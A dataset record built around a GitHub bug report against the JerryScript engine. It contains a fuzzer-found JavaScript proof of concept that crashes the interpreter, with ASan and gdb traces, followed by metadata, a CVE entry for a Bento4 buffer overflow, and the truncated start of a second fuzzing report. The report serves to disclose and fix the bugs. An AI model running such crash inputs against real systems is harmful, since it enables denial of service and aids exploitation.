###### JerryScript revision ``` $ git show commit a588e4966175a190ec6350b2a3689d30ed017ec9 (HEAD -> master, origin/master, origin/HEAD) Author: Máté Tokodi <tokodi.mate.24@gmail.com> Date: Wed Sep 20 15:38:30 2023 +0200 ``` ###### Build & Execution platform ``` $ uname -a Linux user-AYA-NEO-FOUNDER 5.19.0-43-generic #44~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon May 22 13:39:36 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` ###### Build steps ``` export CC=clang python tools/build.py --compile-flag=-fsanitize-coverage=trace-pc-guard --compile-flag="-fsanitize=address -g" --profile=es.next --lto=off --compile-flag=-D_POSIX_C_SOURCE=200809 --stack-limit=15 --compile-flag=-Werror --compile-flag=-Wincompatible-pointer-types --compile-flag=-Wno-strict-prototypes ``` ###### Test case the pocfile.js ``` async function f0(a1, a2) { function f6(a7, a8, a9, ...a10) { return f0; } var o11 = { "get": f0, }; var v12 = f0(); v12.__proto__ = f0; async function f13(a14, a15) { ("h").matchAll(a14); return v12; } f13(v12); var v19 = new Proxy(f6, o11); f0.__proto__ = v19; f0["F"](h); return f0; } f0(f0, f0); // CRASH INFO // ========== // TERMSIG: 11 // STDERR: // // STDOUT: // // ARGS: /home/user/jerryscript/build/bin/jerry --reprl-fuzzilli // EXECUTION TIME: 129ms ``` ###### Execution steps ```sh ./build/bin/jerry pocfile.js ``` ###### Output asan report: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==4145220==ERROR: AddressSanitizer: SEGV on unknown address 0x000001632228 (pc 0x0000004fa98a bp 0x7ffd146d3570 sp 0x7ffd146d3450 T0) ==4145220==The signal is caused by a READ memory access. #0 0x4fa98a in ecma_get_object_type /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/base/ecma-helpers.c:238:58 #1 0x530b2b in ecma_op_object_get_own_property_descriptor /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1806:7 #2 0x53742e in ecma_proxy_object_get /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:1185:25 #3 0x5bafa5 in ecma_builtin_string_prototype_object_match_all /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:384:32 #4 0x5bafa5 in ecma_builtin_string_prototype_dispatch_routine /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1397:12 #5 0x50b96c in ecma_builtin_dispatch_routine /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460:10 #6 0x50b96c in ecma_builtin_dispatch_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489:12 #7 0x525d04 in ecma_op_function_call_native_built_in /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217:5 #8 0x52548f in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411:16 #9 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #10 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #11 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #12 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #13 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #14 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #15 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #16 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #17 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #18 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #19 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #20 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #21 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #22 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #23 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #24 0x5373ba in ecma_proxy_object_get /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:1173:30 #25 0x58d2a9 in vm_loop /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:2959:20 #26 0x582c82 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5211:37 #27 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #28 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #29 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #30 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #31 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #32 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #33 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #34 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #35 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #36 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #37 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #38 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #39 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #40 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #41 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #42 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #43 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #44 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #45 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #46 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #47 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #48 0x581ba0 in vm_run_global /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:286:25 #49 0x4dae6a in jerry_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/api/jerryscript.c:548:24 #50 0x5f9127 in jerryx_source_exec_script /home/user/fuzz/jerryscript_origin/jerryscript/jerry-ext/util/sources.c:68:14 #51 0x4d6e94 in main /home/user/fuzz/jerryscript_origin/jerryscript/jerry-main/main-desktop.c:156:20 #52 0x7f1536429d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #53 0x7f1536429e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #54 0x41ee74 in _start (/home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry+0x41ee74) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/base/ecma-helpers.c:238:58 in ecma_get_object_type ==4145220==ABORTING ``` ###### Backtrace ``` $ gdb -nx -q ./jerry -ex 'r /home/user/fuzzilli-0.9.3/Targets/Jerryscript/out/crashes/program_20230514101203_40AD785C-9A14-45A0-90E3-D89516D5715C_deterministic.js' Reading symbols from ./jerry... Starting program: /home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry /home/user/fuzzilli-0.9.3/Targets/Jerryscript/out/crashes/program_20230514101203_40AD785C-9A14-45A0-90E3-D89516D5715C_deterministic.js [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00000000004fa98a in ecma_get_object_type (object_p=object_p@entry=0x1632228) at /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/base/ecma-helpers.c:238 238 return (ecma_object_type_t) (object_p->type_flags_refs & ECMA_OBJECT_TYPE_MASK); (gdb) ``` ###### Expected behavior SEGV or crash ###### Credits: @gandalf4a of PKU-Changsha Institute for Computing and Digital Economy
SEGV ./jerry-core/ecma/base/ecma-helpers.c:238:58
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5101/comments
1
2023-10-04T12:41:53Z
2024-03-27T02:29:25Z
https://github.com/jerryscript-project/jerryscript/issues/5101
1,926,132,986
5,101
[ -0.02791563607752323, -0.02278934232890606, -0.007645850535482168, 0.011673652566969395, 0.030810074880719185, 0.0032562429551035166, -0.024253997951745987, 0.03923184424638748, -0.03940620645880699, 0.0358143150806427, -0.015910692512989044, 0.021969832479953766, 0.02374834194779396, -0.0...
1,126
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : SEGV ./jerry-core/ecma/base/ecma-helpers.c:238:58 Issue date: --- start body --- ###### JerryScript revision ``` $ git show commit a588e4966175a190ec6350b2a3689d30ed017ec9 (HEAD -> master, origin/master, origin/HEAD) Author: Máté Tokodi <tokodi.mate.24@gmail.com> Date: Wed Sep 20 15:38:30 2023 +0200 ``` ###### Build & Execution platform ``` $ uname -a Linux user-AYA-NEO-FOUNDER 5.19.0-43-generic #44~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Mon May 22 13:39:36 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` ###### Build steps ``` export CC=clang python tools/build.py --compile-flag=-fsanitize-coverage=trace-pc-guard --compile-flag="-fsanitize=address -g" --profile=es.next --lto=off --compile-flag=-D_POSIX_C_SOURCE=200809 --stack-limit=15 --compile-flag=-Werror --compile-flag=-Wincompatible-pointer-types --compile-flag=-Wno-strict-prototypes ``` ###### Test case the pocfile.js ``` async function f0(a1, a2) { function f6(a7, a8, a9, ...a10) { return f0; } var o11 = { "get": f0, }; var v12 = f0(); v12.__proto__ = f0; async function f13(a14, a15) { ("h").matchAll(a14); return v12; } f13(v12); var v19 = new Proxy(f6, o11); f0.__proto__ = v19; f0["F"](h); return f0; } f0(f0, f0); // CRASH INFO // ========== // TERMSIG: 11 // STDERR: // // STDOUT: // // ARGS: /home/user/jerryscript/build/bin/jerry --reprl-fuzzilli // EXECUTION TIME: 129ms ``` ###### Execution steps ```sh ./build/bin/jerry pocfile.js ``` ###### Output asan report: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==4145220==ERROR: AddressSanitizer: SEGV on unknown address 0x000001632228 (pc 0x0000004fa98a bp 0x7ffd146d3570 sp 0x7ffd146d3450 T0) ==4145220==The signal is caused by a READ memory access. #0 0x4fa98a in ecma_get_object_type /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/base/ecma-helpers.c:238:58 #1 0x530b2b in ecma_op_object_get_own_property_descriptor /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-objects.c:1806:7 #2 0x53742e in ecma_proxy_object_get /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:1185:25 #3 0x5bafa5 in ecma_builtin_string_prototype_object_match_all /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:384:32 #4 0x5bafa5 in ecma_builtin_string_prototype_dispatch_routine /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1397:12 #5 0x50b96c in ecma_builtin_dispatch_routine /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460:10 #6 0x50b96c in ecma_builtin_dispatch_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489:12 #7 0x525d04 in ecma_op_function_call_native_built_in /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217:5 #8 0x52548f in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411:16 #9 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #10 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #11 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #12 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #13 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #14 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #15 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #16 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #17 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #18 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #19 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #20 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #21 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #22 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #23 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #24 0x5373ba in ecma_proxy_object_get /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-proxy-object.c:1173:30 #25 0x58d2a9 in vm_loop /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:2959:20 #26 0x582c82 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5211:37 #27 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #28 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #29 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #30 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #31 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #32 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #33 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #34 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #35 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #36 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #37 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #38 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #39 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #40 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #41 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #42 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #43 0x52592a in ecma_op_function_call_simple /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1176:28 #44 0x5254c5 in ecma_op_function_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1406:16 #45 0x5832d5 in opfunc_call /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:758:5 #46 0x5832d5 in vm_execute /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5217:9 #47 0x581e39 in vm_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:5312:10 #48 0x581ba0 in vm_run_global /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/vm/vm.c:286:25 #49 0x4dae6a in jerry_run /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/api/jerryscript.c:548:24 #50 0x5f9127 in jerryx_source_exec_script /home/user/fuzz/jerryscript_origin/jerryscript/jerry-ext/util/sources.c:68:14 #51 0x4d6e94 in main /home/user/fuzz/jerryscript_origin/jerryscript/jerry-main/main-desktop.c:156:20 #52 0x7f1536429d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #53 0x7f1536429e3f in __libc_start_main csu/../csu/libc-start.c:392:3 #54 0x41ee74 in _start (/home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry+0x41ee74) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/base/ecma-helpers.c:238:58 in ecma_get_object_type ==4145220==ABORTING ``` ###### Backtrace ``` $ gdb -nx -q ./jerry -ex 'r /home/user/fuzzilli-0.9.3/Targets/Jerryscript/out/crashes/program_20230514101203_40AD785C-9A14-45A0-90E3-D89516D5715C_deterministic.js' Reading symbols from ./jerry... Starting program: /home/user/fuzz/jerryscript_origin/jerryscript/build/bin/jerry /home/user/fuzzilli-0.9.3/Targets/Jerryscript/out/crashes/program_20230514101203_40AD785C-9A14-45A0-90E3-D89516D5715C_deterministic.js [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x00000000004fa98a in ecma_get_object_type (object_p=object_p@entry=0x1632228) at /home/user/fuzz/jerryscript_origin/jerryscript/jerry-core/ecma/base/ecma-helpers.c:238 238 return (ecma_object_type_t) (object_p->type_flags_refs & ECMA_OBJECT_TYPE_MASK); (gdb) ``` ###### Expected behavior SEGV or crash ###### Credits: @gandalf4a of PKU-Changsha Institute for Computing and Digital Economy --- end body --- comments : --- start comments --- --- end comments ---
10,189
CVE-2024-31002
2024-04-02T08:15:59.863
Buffer Overflow vulnerability in Bento4 Bento v.1.6.0-641 allows a remote attacker to execute arbitrary code via the AP4 BitReader::ReadCache() at Ap4Utils.cpp component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/axiomatic-systems/Bento4/issues/939" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/zhangteng0526/CVE-information/blob/main/CVE-2024-31002" } ]
null
null
[ "axiomatic-systems", "Bento4" ]
Issue
Dear Bento4 developers, I used AFL++ to fuzz test Bento4 and found some problems. To debug a program built with ASan, here is some output ``` ================================================================= ==3304149==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000160 at pc 0x00000055f635 bp 0x7ffce575b390 sp 0x7ffce575b388 READ of size 1 at 0x602000000160 thread T0 #0 0x55f634 in AP4_BitReader::ReadCache() const /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Utils.cpp:447:40 #1 0x55f634 in AP4_BitReader::ReadBits(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Utils.cpp:467:40 #2 0x689547 in AP4_Dac4Atom::AP4_Dac4Atom(unsigned int, unsigned char const*) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Dac4Atom.cpp:238:75 #3 0x68023a in AP4_Dac4Atom::Create(unsigned int, AP4_ByteStream&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Dac4Atom.cpp:58:16 #4 0x5e0d23 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:776:24 #5 0x5dbfaf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #6 0x66f83f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ContainerAtom.cpp:194:12 #7 0x5282fe in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4SampleEntry.cpp:420:5 #8 0x4eea5d in AP4_EncaSampleEntry::AP4_EncaSampleEntry(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Protection.cpp:74:5 #9 0x5df5d5 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:298:24 #10 0x5dbfaf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #11 0x5424ae in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:101:13 #12 0x53f61b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4StsdAtom.cpp:57:16 #13 0x5df866 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:458:20 #14 0x5dbfaf in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:234:14 #15 0x5dafb8 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4AtomFactory.cpp:154:12 #16 0x4dac06 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:104:12 #17 0x4db68f in AP4_File::AP4_File(AP4_ByteStream&, bool) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4File.cpp:78:5 #18 0x4c7733 in main /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250:22 #19 0x7f0af5948082 in __libc_start_main /build/glibc-wuryBv/glibc-2.31/csu/../csu/libc-start.c:308:16 #20 0x41c8ed in _start (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x41c8ed) 0x602000000160 is located 0 bytes to the right of 16-byte region [0x602000000150,0x602000000160) allocated by thread T0 here: #0 0x4c48ad in operator new[](unsigned long) (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x4c48ad) #1 0x4d7ec3 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:210:28 #2 0x4d7ec3 in AP4_DataBuffer::SetBufferSize(unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4DataBuffer.cpp:136:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Utils.cpp:447:40 in AP4_BitReader::ReadCache() const Shadow bytes around the buggy address: 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8010: fa fa 04 fa fa fa fd fa fa fa 01 fa fa fa 00 fa =>0x0c047fff8020: fa fa 00 07 fa fa 00 07 fa fa 00 00[fa]fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3304149==ABORTING ``` ``` ================================================================= ==72210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000009a0 at pc 0x000000494530 bp 0x7fffba3cc440 sp 0x7fffba3cbc08 WRITE of size 4294967280 at 0x6190000009a0 thread T0 #0 0x49452f in __asan_memcpy (/home/zt/cnvd/Bento4/Bento4-fuzzer/build/mp42aac+0x49452f) #1 0x4d2f73 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:785:5 #2 0x4ca625 in AP4_ByteStream::Write(void const*, unsigned int) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4ByteStream.cpp:77:29 #3 0x66a336 in AP4_CencSampleEncryption::DoWriteFields(AP4_ByteStream&) /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4CommonEncryption.cpp:3569:16 #4 0x5ae219 in AP4_Atom::Clone() /home/zt/cnvd/Bento4/Bento4-fuzzer/Source/C++/Core/Ap4Atom.cpp:316:9 #5 0x509fd4 in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) 